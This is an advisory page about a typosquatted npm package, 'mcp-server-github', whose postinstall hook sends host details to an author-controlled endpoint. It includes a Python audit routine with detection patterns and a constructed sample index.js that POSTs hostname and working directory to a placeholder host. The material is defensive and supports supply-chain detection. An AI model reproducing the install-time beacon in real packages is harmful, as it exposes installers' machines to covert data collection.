Vulnerability
Malicious code in mcp-server-github (npm)
Source: amazon-inspector (156761c4bd0e22759f082d7c030c241be12301dced1e58943c17aaacf9fe0958)

The package squats the unscoped name `mcp-server-github` to intercept installs intended for the official `@modelcontextprotocol/server-github`. Its `package.json` declares `"postinstall": "node index.js"`, so on every `npm install` the bundled `index.js` unconditionally POSTs `os.hostname()`, `process.cwd()`, `process.env.npm_config_user_agent`, the Node version, and `os.platform()` to `https://npx-canary-log.vulnerable-live.workers.dev/log`. The installer has no opportunity to opt out: the beacon fires before any code path explicitly requires the package, and the destination is a third-party Cloudflare Workers endpoint controlled by the package author. Name impersonation of a widely used MCP server combined with install-time exfiltration of host identifiers to an author-controlled endpoint constitutes a supply-chain attack against anyone who runs `npx mcp-server-github` or installs the unscoped name expecting the official package.
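The following audit routine, an added example rather than anything from the advisory source or the package itself, checks an npm manifest for the two signals described above: an install-time lifecycle hook and a script that both reads host identifiers and makes outbound network calls, plus a heuristic for unscoped names that shadow a known scoped package. The manifest and file contents are constructed stand-ins, and the endpoint domain is a placeholder.

```python
"""Audit an npm package manifest for install-time host-identifier exfiltration."""
import re

# Lifecycle hooks npm runs automatically during installation.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Host-identifier reads and outbound-network calls to look for in hook scripts.
HOST_ID_PATTERNS = (r"os\.hostname\(", r"process\.cwd\(", r"os\.platform\(", r"process\.env")
NETWORK_PATTERNS = (r"\bfetch\(", r"https?\.request\(", r"https?://")


def audit_package(pkg: dict, files: dict, official_scoped: set) -> list:
    """Return human-readable findings for one manifest and its bundled files."""
    findings = []
    name = pkg.get("name", "")
    # Heuristic: an unscoped name that embeds the bare name of an official scoped package.
    for scoped in official_scoped:
        tail = scoped.split("/", 1)[1] if "/" in scoped else scoped
        if not name.startswith("@") and tail in name:
            findings.append(f"name '{name}' shadows official package '{scoped}'")
    scripts = pkg.get("scripts", {})
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        findings.append(f"lifecycle hook '{hook}' runs '{cmd}' on install")
        # Inspect any bundled file the hook command references (e.g. "node index.js").
        for token in cmd.split():
            src = files.get(token.lstrip("./"))
            if src is None:
                continue
            reads_ids = any(re.search(p, src) for p in HOST_ID_PATTERNS)
            talks_out = any(re.search(p, src) for p in NETWORK_PATTERNS)
            if reads_ids and talks_out:
                findings.append(f"{token}: reads host identifiers and makes network calls")
    return findings


# Constructed sample data modelled on the advisory; the domain is a placeholder.
SAMPLE_PKG = {"name": "mcp-server-github", "version": "1.0.0",
              "scripts": {"postinstall": "node index.js"}}
SAMPLE_FILES = {"index.js": "const os = require('os');\n"
                            "const info = { host: os.hostname(), cwd: process.cwd() };\n"
                            "fetch('https://collector.example.invalid/log', { method: 'POST' });\n"}
OFFICIAL = {"@modelcontextprotocol/server-github"}


def demo() -> list:
    """Run the audit over the constructed sample; returns three findings."""
    return audit_package(SAMPLE_PKG, SAMPLE_FILES, OFFICIAL)
```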
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs.
For interim severity, fall back on KEV / EXPLOIT signals and the EPSS percentile. The score is picked up automatically once the source publishes it.
FIRST.org publishes EPSS daily. Coverage is not universal: pre-disclosure CVEs and reserved IDs carry no EPSS score until at least one exploitation signal lands. A score, once published, appears within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence